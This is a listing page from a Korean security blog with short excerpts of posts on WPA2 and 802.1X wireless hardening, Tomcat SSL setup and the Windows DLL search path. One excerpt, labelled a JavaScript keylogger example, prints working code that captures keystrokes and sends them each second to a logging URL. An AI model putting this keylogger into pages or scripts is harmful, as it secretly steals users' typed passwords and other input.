hi.pe.kr2191 802.1x EAP 인증과 WPA2 적용이 최선 무선랜 사용에 따른 해킹 문제 소호 무선랜 구성의 개선 방향 - 현재 소호 무선랜은 인증 및 암호화가 적용되지 않아 매우 취약하므로 인증서버 탑재 AccessPoint로 비인가자 접속을 원천 차단하여야 함 - WPA2는 EAP-TLS/TTLS/PEAP/FAST/AKA/LEAP등의 많은 인증관련 방법을 사용할 수 있음 - 한국기술비젼이 제시한 WPA2 + TKIP/AES는 EAP-PEAP/MS-CHAPv2등의 인증 메커니즘을 통해 AP에 내장된 인증서버(Radius)의 인증과 공유키의 동적 배포를 통해 도청을 방지하고, 무선 네트워크 접속을 제어하게됨. *한국기술비젼 특허출원 [통합형 무선 통신 장치와 그의 동작 방법, 2009-99127] 기업 무선랜 구성의 개선 방향 - Enterprise 수준의 보안.. 2010. 9. 7. Automated vs. Manual Security Automated vs. Manual Security: You can't filter "The Stupid" http://blip.tv/play/AYHwpGEC 2010. 9. 6. Javascript Keylogger 예제 var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ new Image().src = 'http://localhost/junkylogger.php?keys='+keys; keys = ''; }, 1000); GM_setValue('keys', ''); unsafeWindow.onkeypress = function(e) { eventobj = window.event?event:e; key = eventobj.ke.. 2010. 9. 3. Tomcat Web Server SSL 설정 디지털 커머스의 증가와 중요한 데이터간의 이동이 필요함에 따라서 보안은 모든 어플리케이션에서 중요한 자리를 차자하고 있습니다. 일반적으로 client 와 서버간에 사용자를 확인하기 위한 방법으로 username 과 password 를 체크합니다. 이를 사용하는 보안 처리 기법으로 Secure Sockets Layer (SSL) 과 Java Authentication and Authorization Service (JAAS)를 사용할 수가 있습니다. 먼저 SSL로 보안인증을 거치는 방법을 보고 java 에서 지원하는 다른 사용자 인증서비스인 JAAS을 jsp와 서블릿에서 사용하는 법을 보겠습니다. 1. 톰켓에서 사용자 인증 처리하기 톰켓으로 사용자 인증처리를 하기전에 먼저 username, password.. 2010. 9. 2. DLL 검색 경로 알고리즘 제어 (CWDIllegalInDllSearch) CWDIllegalInDllSearch 레지스트리 키 작동 방식 응용 프로그램이 정규화된 경로를 지정하지 않은 상태로 DLL을 동적으로 로드하면 Windows는 잘 정의된 디렉터리 집합을 검색하여 이 DLL을 찾으려고 합니다. 이러한 디렉터리 집합을 DLL 검색 경로라고 합니다. Windows는 디렉터리에서 DLL을 찾는 즉시 해당 DLL을 로드합니다. Windows는 DLL 검색 순서의 어떤 디렉터리에서도 해당 DLL을 찾지 못하면 DLL 로드 작업 실패 결과를 반환합니다. LoadLibrary 함수 및 LoadLibraryEx 함수는 DLL을 동적으로 로드하는 데 사용됩니다. 다음은 이러한 두 함수의 DLL 검색 순서입니다. 응용 프로그램이 로드되는 디렉터리 시스템 디렉터리 16비트 시스템 디렉터리 .. 2010. 9. 1. 이전 1 ··· 287 288 289 290 291 292 293 ··· 439 다음
